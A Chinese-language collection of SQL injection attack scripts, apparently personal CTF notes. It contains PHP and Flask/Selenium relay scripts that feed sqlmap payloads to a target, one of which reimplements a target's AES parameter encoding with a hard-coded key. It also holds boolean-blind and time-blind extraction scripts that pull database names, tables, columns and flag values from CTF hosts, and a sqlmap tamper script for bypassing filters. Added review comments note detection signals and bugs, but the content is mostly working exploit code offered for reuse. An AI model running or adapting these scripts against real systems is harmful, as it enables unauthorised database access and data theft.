有绕过请自行更改
中转注入
PHP版
简洁版
<?php
// Minimal relay: take the caller's id parameter, base64-encode the string
// "id=<value>" and forward it as the whole query string of the original
// page, echoing that page's response back. $_GET['id'] is passed through
// unchanged and unvalidated, and the receiving page must base64-decode the
// query string itself (there is no parameter name on the forwarded URL).
$id=base64_encode("id=".$_GET['id']);
echo file_get_contents("http://xxx.com/sqli.php?{$id}"); //sqli.php is the original page
?>
正式版
<?php
function encode($id){
// Re-creates the target's parameter encoding so a relayed value is accepted:
// append the fixed suffix 'hxb2018', encrypt with Rijndael-128 in CBC mode
// (AES-128 for a 16-byte key) under the hard-coded key/IV below, then
// base64-encode the ciphertext twice. mcrypt_generic() zero-pads the input
// to the block size rather than using PKCS#7.
// NOTE: the mcrypt_* extension was deprecated in PHP 7.1 and removed in 7.2;
// this function only works on older interpreters.
// From a defensive standpoint: a static key and static IV with no MAC give
// no integrity protection, so encrypting the parameter is not a validation
// control — anyone holding the key can produce a valid ciphertext for any value.
$id = $id.'hxb2018';
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
// key 'ydhaqPQnexoaDuW3' (16 bytes) and IV '2018201920202021' (16 bytes), as given on the page
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = base64_encode(base64_encode(mcrypt_generic($td,$id)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
return $data;
}
// Relay: encode the caller's id with encode() above, fetch list.php with it
// and echo the response verbatim.
$url = 'http://47.107.236.42:49882/news/list.php?id=';
$param = encode($_GET['id']); // caller-supplied, unvalidated
$response = file_get_contents($url.$param); // returns false on failure; not checked
echo $response;
?>
<?php
//First enable extension=php_curl.dll in php.ini (Windows build of PHP)
// cURL-based relay skeleton: reads the caller's id, percent-encodes space and
// '=' by hand, then issues a GET to $url.
// NOTE(review): $id is computed but never appended to $url, so the request as
// written does not carry the parameter at all — presumably unfinished.
set_time_limit(1); // hard 1-second execution limit for this script
$curl = curl_init();//initialise the cURL handle
$id = $_GET['id']; // caller-supplied, unvalidated
//replace space and '=' in id by hand (other reserved characters are left as-is)
$id = str_replace(" ","%20",$id);
$id = str_replace("=","%3D",$id);
$url = "http://xxx.com/aaa.php";
// target URL
curl_setopt($curl, CURLOPT_URL, $url);
// do not include the response headers in the output
curl_setopt($curl, CURLOPT_HEADER, 0);
// RETURNTRANSFER=0: the body is written straight to the output buffer and
// curl_exec() returns true/false instead of the body, so $data is only a flag.
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 0);
// perform the request
$data = curl_exec($curl); // no curl_errno()/HTTP status check
// release the handle
curl_close($curl);
?>
Python版
from flask import Flask
from flask import request
from selenium import webdriver
# Module-level browser setup: a single Chrome session is started and the
# target page is loaded once, at import time, before the Flask app exists.
# The chromedriver path is a Windows-specific absolute path.
# NOTE(review): passing the executable path positionally to webdriver.Chrome
# is the Selenium 3 API; Selenium 4 expects a Service object — confirm the
# installed version.
driver_path = "C:/Users/Administrator/AppData/Local/Programs/Python/Python37/Lib/site-packages/selenium/webdriver/chrome/chromedriver.exe"
chrome = webdriver.Chrome(driver_path)
chrome.get("http://127.0.0.1") # target page that contains the injection point
app = Flask(__name__)
def send(payload):
# Relay step: type `payload` into the username field of the page opened at
# import time, fill a dummy password and click submit. Nothing is read back
# from the page; the caller only receives a placeholder string.
# NOTE(review): find_element_by_id was removed in Selenium 4
# (find_element(By.ID, ...)). The page is not reloaded and the inputs are
# not cleared between calls, so consecutive requests append to the same
# fields unless submit navigates away — verify against the target page.
chrome.find_element_by_id("username").send_keys(payload) # type the payload into the injectable field
chrome.find_element_by_id("password").send_keys("aaaa")
chrome.find_element_by_id("submit").click()
return "plase see flask server!" # placeholder; the outcome is observed in the browser/server, not here
@app.route('/')
def index():
# HTTP entry point: read the "payload" query parameter (sent by sqlmap) and
# hand it to send(). The parameter is forwarded as-is; it is None when absent.
payload = request.args.get("payload")
return send(payload)
if __name__ == "__main__":
app.run() # Flask development server with default host/port (127.0.0.1:5000)
布尔盲注
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
# Boolean-based blind extraction driven by a response-content oracle: the
# injected comparison is judged true when the marker ' turning' appears in
# the page body. Each character position costs up to 82 near-identical
# requests that differ only in two integer literals, which is what makes this
# pattern stand out in request logs; parameterised queries remove the oracle.
urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning' # response marker for a true condition (a plain str, not Python's True)
name = ''
for number1 in range(50): # one outer iteration per character position (counter starts at 0)
for number2 in range(44, 126): # candidate code points 44..125 (',' .. '}')
# # database name
# url = urls + 'ascii(substr(database() from %d for 1))=%d' % (number1, number2)
# # table names
# url = urls + 'ascii(substr((selectgroup_concat(table_name) from information_schema.tables where table_schema=database())%d,1))=%d' % (number1,number2)
# column names
# url = urls + 'ascii(substr((selectcolumn_name from information_schema.columns where table_name="flag" limit 0,1),%d,1))=%d' % (number1,number2)
# column contents
url = urls + 'ascii(substr((select flag from flag)from %d for 1))=%d' % (number1,number2)
response = requests.get(url) # no timeout and no status check; a network error aborts the run
if true in response.text:
name += chr(number2) # chr() maps the matched code point back to a character
print(name, '...')
break
# NOTE: a position where no candidate matched is skipped silently, so the
# result can be shorter than the real value with no error shown.
print('\n>>>flag=', name, '<<<\n')
版本二
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
# Shared state for the functions below: the base URL the condition is
# appended to, and the marker that identifies a true response.
urls = 'http://challenge-f99d8d9361e35dff.sandbox.ctfhub.com:10080/?id='
true = 'query_success' # response marker for a true condition (a plain str, not Python's True)
#库名
def database_name():
# Recover the current database name one character at a time. A candidate
# letter is accepted when the marker appears in the response; the false
# branch of the injected if() runs a multi-row subquery, so the page errors
# instead of succeeding.
name = ''
for number in range(1,8):# positions 1..7: assumed maximum length of the name
for letter in 'qwertyuioplkjhgfdsazxcvb':# candidate alphabet: lowercase letters only, and note 'n'/'m' are absent
url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number, letter)# %d integer position, %s candidate letter
response = requests.get(url)
if true in response.text:# marker present -> this letter is correct at this position
name = name + letter
print(name,'...')
break# stop trying candidates for this position
print('\n>>>database_name=',name,'<<<\n')
# database_name()
#表名
def table_name():
# Recover table names of the current database: one table per `limit N,1`
# window, one character per inner loop, using the same response-marker
# oracle as database_name().
list = [] # NOTE: shadows the builtin list() for the rest of this function
for number1 in range(3):# assumes at most 3 tables
name = ''
for number2 in range(1,8):# positions 1..7 of the table name
for letter in 'qwertyuioplkjhgfdsazxcvbnm':# full lowercase alphabet
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
print(url) # every probe URL is echoed to stdout
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name) # one entry per table, possibly shorter than the real name if a position had no match
print('\n>>>table_name=', list,'<<<\n')
table_name() # runs at import/script time; the other stages are commented out below
#字段名
def column_name():
# Recover column names of the table "flag" in the current database, one
# column per `limit N,1` window and one character per inner loop, using the
# same response-marker oracle.
list = [] # NOTE: shadows the builtin list() for the rest of this function
for number1 in range(3): # at most 3 columns are enumerated (the original comment said 4)
name = ''
for number2 in range(1,8): # positions 1..7 of the column name (the original comment said 9)
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name)
print('\n>>>column_name=', list,'<<<\n')
# column_name()
#字段信息
def get_flag():
# Recover the value of flag.flag by code point: the inner loop compares
# ascii(substr(...)) against each candidate integer and accepts the first
# one for which the marker appears in the response.
name = ''
for number1 in range(50): # one iteration per character position (counter starts at 0)
for number2 in range(48, 126): # candidate code points 48..125 ('0' .. '}')
url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
number1, number2)
response = requests.get(url)
if true in response.text:
name = name + chr(number2)# chr() maps the matched code point back to a character
print(name,'...')
break
print('\n>>>flag=',name,'<<<\n')
# get_flag()
运用left进行截取
import requests
# Prefix-based boolean blind extraction: instead of testing one character,
# each probe compares left(database(), n) with the prefix recovered so far
# plus one candidate character. The marker 'You' in the response body marks
# a true comparison.
url = 'http://4a1c1083-75e8-4cf2-92d8-55cda4100937.node3.buuoj.cn/Less-8/?id='
flag = ''
for number in range(1,10): # prefix lengths 1..9
for letter in range(33,126): # candidate code points 33..125 (printable ASCII minus space)
payload0 = flag + '%s' % (chr(letter)) # recovered prefix + candidate
payload = "1' and left(database()," + str(number) + ")=" + "\'" + payload0 + "\'" + '--+'
response = requests.get(url + payload) # no timeout, no status check
if 'You' in response.text:
flag += chr(letter) # `flag` keeps the matched character as-is
print(flag.lower()) # lower() is for display only
break
print(flag)
时间盲注
版本一
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
# Time-based blind extraction through a POST field: the injected if() calls
# sleep(1) when the comparison holds, and the client treats a response time
# of at least 1s as a match. Timing includes network latency, so a slow
# round-trip can produce a false match; there is no retry or confirmation.
# A sleep() call inside a form field value is a high-signal indicator in
# request logs.
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for number1 in range(1,50): # character positions 1..49
for number2 in range(45,126): # candidate code points 45..125 ('-' .. '}')
#payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'# this step can be skipped; substituting the recovered database name for database()/table_schema below may be more accurate
#payload = f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = "{chr(number2)}",sleep(2),1)'
#payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" and table_schema="ctfshow_web"),{number1},1) = "{chr(number2)}",sleep(2),1)'
payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
# alternative technique: use the client-side measured response time
# NOTE: this rebinding shadows the `time` module imported above; the
# commented-out time.time() calls would fail after this line.
time = response.elapsed.total_seconds()# response time in seconds (requests measures send -> response headers)
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1:
name = name + chr(number2)
print(str.lower(name)) # lowercased for display only
break
仔细看还是可以用的
版本二
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
# Time-based blind extraction, second variant: an extra outer loop walks
# `limit {i},1` windows so several tables/columns can be enumerated in one
# run. The oracle is the same as in the first variant (sleep in the injected
# branch, response time >= 1s counts as a match, no retry).
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for i in range(4):# number of tables or columns to enumerate
for number1 in range(1,50): # character positions 1..49
for number2 in range(45,126): # candidate code points 45..125 ('-' .. '}')
#payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'
#payload = f'if(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{number1},1) = "{chr(number2)}",sleep(1),1)'
payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" limit {i},1),{number1},1) = "{chr(number2)}",sleep(2),1)'
#payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
# alternative technique: use the client-side measured response time
# NOTE: this rebinding shadows the `time` module imported above; the
# commented-out time.time() calls would fail after this line.
time = response.elapsed.total_seconds()# response time in seconds (requests measures send -> response headers)
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1: # the active payload sleeps 2s; the threshold stays at 1s
name = name + chr(number2) # NOTE: `name` is never reset between windows, so results of all i are concatenated
print(str.lower(name))
break
下面那个版本应该可以避免此类状况
版本三 字符型注入
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
# Time-based blind extraction, string-context variant: the payload first
# closes an open single quote ("1' or ...") and re-balances it at the end
# ("and '1'='1"). Oracle and limitations are the same as in the first
# variant (sleep in the injected branch, >= 1s counts as a match, no retry).
url = "http://c6778fe7-8d66-4e93-a617-efcdb0c32c18.chall.ctf.show/api/"
name = ''
for number1 in range(1,50): # character positions 1..49
for number2 in range(45,126): # candidate code points 45..125 ('-' .. '}')
#payload = f"1' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"# this step can be skipped; substituting the recovered database name for database()/table_schema below may be more accurate
#payload = f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
#payload = f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
payload = f"1' or if(substr((select flagaa from ctfshow_flagxc),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
# alternative technique: use the client-side measured response time
# NOTE: this rebinding shadows the `time` module imported above; the
# commented-out time.time() calls would fail after this line.
time = response.elapsed.total_seconds()# response time in seconds (requests measures send -> response headers)
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1:
name = name + chr(number2)
print(str.lower(name)) # lowercased for display only
break
版本四
#!/usr/bin/env python
"""
Author: huayang
"""
import requests, time
urls = 'http://challenge-f8fcb03f18fbc00a.sandbox.ctfhub.com:10080/?id=' # base URL shared by the functions below; the condition is appended to it
def database_name():
# Time-based variant of the name recovery: a candidate letter is accepted
# when the round-trip measured with time.time() exceeds 1s (the injected
# branch sleeps 1s). Wall-clock timing includes network latency, so a slow
# hop can produce a false match; there is no retry or confirmation.
name = ''
for number in range(8): # positions 0..7
for letter in 'qwertyuioplkjhgfdsazxcvbnm': # lowercase letters only
url = urls + 'if(substr(database(),%d,1) = "%s",sleep(1),1)' % (number, letter)
current1_time = time.time()
response = requests.get(url) # no timeout; a hung request blocks here indefinitely
current2_time = time.time()
current = current2_time - current1_time
if current > 1:# strictly greater than the 1s sleep
name = name + letter
print(name)
break
print(name)
def table_name():
# Time-based recovery of table names in schema "sqli": one table per
# `limit N,1` window, one character per inner loop, same wall-clock oracle
# as database_name().
array = []
for number1 in range(4): # at most 4 tables
name = ''
for number2 in range(8): # positions 0..7
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (
number1, number2, letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
array.append(name) # one entry per table window
print(array)
def column_name():
# Time-based recovery of a column name of sqli.flag, one character per
# inner loop, same wall-clock oracle as database_name().
# NOTE: the subquery has no LIMIT, so it is only valid while the table has a
# single column; with more columns it returns several rows — presumably the
# challenge table has one, verify before reuse.
name = ''
for number2 in range(8): # positions 0..7
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (
number2, letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
print(name)
def flag():
# Time-based recovery of the value of sqli.flag.flag, comparing one
# character per probe against chr(number2). Unlike the functions above this
# one accepts a match at `current >= 1` rather than `> 1`.
name = ''
for number1 in range(1, 50): # positions 1..49
for number2 in range(48, 126): # candidate code points 48..125 ('0' .. '}')
url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1, chr(number2))
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current >= 1:
name = name + chr(number2)
print(name)
break
print(name)
# Stages are run one at a time by toggling these calls; only database_name()
# is enabled as written.
database_name()
# table_name()
# column_name()
# flag()
tamper
#!/usr/bin/env python
"""
Author: huayang你
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW # ordering hint read by sqlmap when several tamper scripts are chained
def dependencies():
# sqlmap hook run once when the tamper script is loaded; it only prints a
# banner and declares no real dependency.
singleTimeWarnMessage("\n\n\t>>>huayang<-->bypass<<<\n")
def tamper(payload, **kwargs):
# sqlmap tamper hook: returns a rewritten copy of `payload` in which
# (a) the first whitespace character becomes a tab (0x09),
# (b) '*' becomes '1' (0x31),
# (c) '=' becomes <tab>LIKE<tab>,
# (d) a single quote becomes the percent-encoded pair %00%27,
# and every other character is copied through. An empty/None payload is
# returned unchanged. `quote` and `doublequote` are assigned but never read.
# NOTE(review): the indentation of this copy is flattened, so whether
# (b)-(d) hang off `if not firstspace:` (applied only before the first
# whitespace) or off the inner isspace() test cannot be recovered here —
# verify against the original file before relying on either reading.
# Defensively, all four substitutions survive request logging and are
# undone by ordinary input normalisation (tabs -> spaces, %00 rejected,
# LIKE treated as a comparison operator).
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += chr(0x09) # tab in place of the first whitespace
continue
elif payload[i] == "*":
retVal += chr(0x31) # '1'
continue
elif payload[i] == "=":
retVal += chr(0x09) + 'LIKE' + chr(0x09) # 'a LIKE b' in place of 'a = b'
continue
elif payload[i] == "'":
retVal += '%00%27' # percent-encoded NUL followed by the encoded quote
continue
retVal += payload[i] # default: copy the character unchanged
return retVal